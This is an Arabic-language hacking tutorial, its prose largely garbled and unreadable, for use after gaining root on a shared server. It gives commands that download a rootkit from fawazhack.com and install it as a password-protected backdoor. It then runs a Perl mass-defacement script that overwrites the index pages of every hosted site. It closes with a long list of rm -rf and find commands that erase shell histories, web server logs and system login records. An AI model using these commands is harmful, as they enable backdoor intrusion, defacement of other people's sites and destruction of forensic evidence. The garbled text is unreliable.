م ا٢ ترشغ١ اواي تاأله ارا
local./
م ا٢ تػغ األه ػهع اظالؼ١اخ
id rootا٢ طالؼ١اذا
م ا٢ ترف١م األه
su
ألـم اهخ وا اىاي هلل ؼك
:.حثب١ج اشث و١ج ع اغ١شفش .:
تؼك اؽظي ػ طالؼ١اخ اهخ م ا٢ ترصث١د اهخ و١د افائكج
هظع ١هفه تؼك إطـ١اق اش إوارح أؼر١اؿ١ا ػك إواح
اش ام ونػا ف ا١هفه ػ اهخ و١د األا فرػ فم
تا١هفه اظافح ٠ون ٠ؽ طالؼ١اخ نخ ؼا نظػا ١هفه
ه أـه أال م تؽة اهخ و١د ف إ ىا تا١هفه تئرفكا
اه اؽة
wget http://fawazhack.com/update/rootkit-v1.0.zip ش م تفه اؼغؾ ػ اهخ و١د تئرفكا أه افه
Unzip rootkit-v1.0.zip
ش م تاكـي ػ١ تاأله
cd v1.0
٠ظك ػكخ فاخ ف عك اهخ و١د م األ تئػـاء اف
األا ف اهخ و١د
777 ج ارظان٠ػ اىا Setupتئػـاء م
chmod 777 setup
م األ فمؾ ترشغ١ اهخ و١د ػ ا١هفه تاأله ارا
./setup password port
فم الؼظ األه ٠رى نل ه
نل ه passwordم تػغ تكاي
م تػغ فم ؼ١ ام ه٠ك االذظاي ػ١ تؼك portتكاي
ذهو١ة اهخ و١د
م تاألرظان ل١ال ن٠صا ٠ر ػ اهخ و١د
puttyتؼك ذصث١د اهخ و١د م األ تئرفكا تهاط ٠
host name(or IP address)ف ـاح م تػغ إ ت ا١هفه
اثنخ ام ػؼا ف اهخ و١د portف ـاح
ش ف ذأذ اشاشح اقاء
ا٢ ل تىراتح ا١ون
Root
اهل اه ام ػؼا ف اهخ و١د
ل تػؼ ا٢ غ اؼ ػك وراتح اهل اه ال٠ظه
اؽك هلل ذ االذظاي
:.ع اط د٠فظ .:
ااي ق٠ف ظ١فر ٠م ترغ١ه ظ١غ طفؽاخ االغ اهئ١١ح
١ىذ اع١كج أ وا األكو ف عك ف ما اعك عك أـه ش
index.php ٠م ترغ١ها م أفؼ ١ىاذ
أ وا ا١هفه ٠ؽ الغ وص١هج ارؼة أ ذم ترغ١ه األكو
اؼكا ذ األـه م االقا ذم ترغ١ه ظ١غ اظفؽاخ اهئ١١ح ق
هنن ػ اظفؽاخ اهئ١١ح الغ ذغ١١ها
perlاىهتد ثهط تغح اث١هي
م ترشغ١
م تؽة اف إ إ ىا تا١هفه
wget http:// /fawazhack.com/update/md.zip
فه اؼغؾم األ ب
unzip md.zip
تؼك فه اؼغؾ ػ األقا م تػغ األه ارا
إلظان ـ١اناخ األقاperl mass.pl
اف١اناخ ف األقا ؿه٠مح ذشغ١ا musage : perl mass.pl <path too u're index>
mexample : perl mass.pl /tmp/index.html
<path too u're index طفؽح االـرهاق نافؼ١ ػ١ ااىا
ؼر ٠ثم tmp ػ ا١هفه ػ عك طفؽح االـرهاقاال ؽة ارشغ١أه
األ شغ اىهتد تأه ذشغ١
perl mass.pl /tmp/index.html
إلظان االغ ار ػ ا١هفه
http://whois.webhosting.info
ل تاكـي إ الغ ػغ إ ت ا١هفه ش افك تؼكا إػغؾ
ػ ف إ ت ا١هفه ف الغ ذظه ارائط
:.غح أثاسن اغ١شفش .:
تؼك ػ ااي ق٠ف التك ػ أشانن ػ ا١هفه
م تػ فاخ اق افائكج لاه ا١هفه ٠م ترفى٠ اإل ت
اشانن ف ا١هفه
م ١ا أاه ػ فاخ اق ال٠ظك ه أشه تؼكا إ شاءاهلل
التك ذـث١ما وا
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {}
\;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
اخاحت
ال خري يف كامت العلم